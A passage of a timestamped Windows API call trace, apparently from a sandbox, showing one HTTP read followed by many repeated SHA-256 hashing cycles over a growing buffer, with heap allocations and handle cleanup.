	[0214.434] WinHttpReadData (in: hRequest=0x22c98d8, lpBuffer=0x26abfa1, dwNumberOfBytesToRead=0xbaf, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x26abfa1*, lpdwNumberOfBytesRead=0x128324*=0xbaf) returned 1
	[0214.434] WinHttpQueryDataAvailable (in: hRequest=0x22c98d8, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x0) returned 1
	[0214.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac470
	[0214.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2763c58
	[0214.434] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.434] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.434] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0214.434] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbbd0
	[0214.435] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbbd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbbd0, pdwDataLen=0x128ba4) returned 1
	[0214.435] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.435] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.435] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.435] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.435] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0214.435] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.435] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc378
	[0214.435] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cc378, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc378, pdwDataLen=0x128ba4) returned 1
	[0214.435] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.435] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.435] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.436] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.436] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0214.436] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc3c8
	[0214.436] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc3c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc3c8, pdwDataLen=0x128ba4) returned 1
	[0214.436] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.436] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.436] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.436] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.436] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0214.436] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc3f0
	[0214.436] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cc3f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc3f0, pdwDataLen=0x128ba4) returned 1
	[0214.436] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.436] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.436] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.437] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.437] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0214.437] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbc20
	[0214.437] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbc20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbc20, pdwDataLen=0x128ba4) returned 1
	[0214.437] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.437] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.437] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.437] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.437] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0214.437] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbf90
	[0214.437] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbf90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbf90, pdwDataLen=0x128ba4) returned 1
	[0214.437] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.437] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.437] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.438] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.438] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0214.438] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbec8
	[0214.438] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbec8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbec8, pdwDataLen=0x128ba4) returned 1
	[0214.438] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.438] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.438] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.439] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.440] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0214.440] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbf18
	[0214.440] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbf18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbf18, pdwDataLen=0x128ba4) returned 1
	[0214.440] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.440] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.440] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.440] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.440] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0214.440] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc0f8
	[0214.440] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc0f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc0f8, pdwDataLen=0x128ba4) returned 1
	[0214.440] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.440] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.440] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.441] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.441] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0214.441] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbef0
	[0214.441] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbef0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbef0, pdwDataLen=0x128ba4) returned 1
	[0214.441] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.441] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.441] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.441] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.441] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0214.441] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbf40
	[0214.441] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbf40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbf40, pdwDataLen=0x128ba4) returned 1
	[0214.441] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.441] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.441] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.442] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.442] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0214.442] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbf68
	[0214.442] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbf68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbf68, pdwDataLen=0x128ba4) returned 1
	[0214.442] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.442] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.442] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.442] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.442] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0214.442] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc008
	[0214.442] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc008, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc008, pdwDataLen=0x128ba4) returned 1
	[0214.442] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.442] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.442] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.443] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.443] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0214.443] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc030
	[0214.443] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cc030, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc030, pdwDataLen=0x128ba4) returned 1
	[0214.443] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.443] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.443] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.443] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.443] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0214.443] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc058
	[0214.443] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc058, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc058, pdwDataLen=0x128ba4) returned 1
	[0214.443] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.443] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.443] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.444] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.444] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0214.444] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc080
	[0214.444] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cc080, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc080, pdwDataLen=0x128ba4) returned 1
	[0214.444] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.444] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.444] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.444] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.444] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0214.444] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc0a8
	[0214.444] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc0a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cc0a8, pdwDataLen=0x128ba4) returned 1
	[0214.444] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.445] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.445] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.445] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.445] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0214.445] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbb08
	[0214.445] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbb08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbb08, pdwDataLen=0x128ba4) returned 1
	[0214.445] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.445] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.445] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.445] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.445] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0214.446] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbb80
	[0214.446] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbb80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbb80, pdwDataLen=0x128ba4) returned 1
	[0214.446] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.446] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.446] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.446] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.446] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0214.446] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbba8
	[0214.446] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbba8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbba8, pdwDataLen=0x128ba4) returned 1
	[0214.446] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.446] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.446] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.447] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.447] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0214.447] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbcc0
	[0214.447] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbcc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbcc0, pdwDataLen=0x128ba4) returned 1
	[0214.447] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.447] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.447] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.447] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.447] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0214.447] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbc48
	[0214.447] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbc48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbc48, pdwDataLen=0x128ba4) returned 1
	[0214.447] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.447] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.447] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.448] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.448] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0214.448] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbc98
	[0214.448] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cbc98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbc98, pdwDataLen=0x128ba4) returned 1
	[0214.448] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.448] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.448] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.448] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.448] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0214.448] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbd10
	[0214.448] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x26cbd10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x26cbd10, pdwDataLen=0x128ba4) returned 1
	[0214.448] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.448] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.448] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.449] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.449] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x320, dwFlags=0x0) returned 1
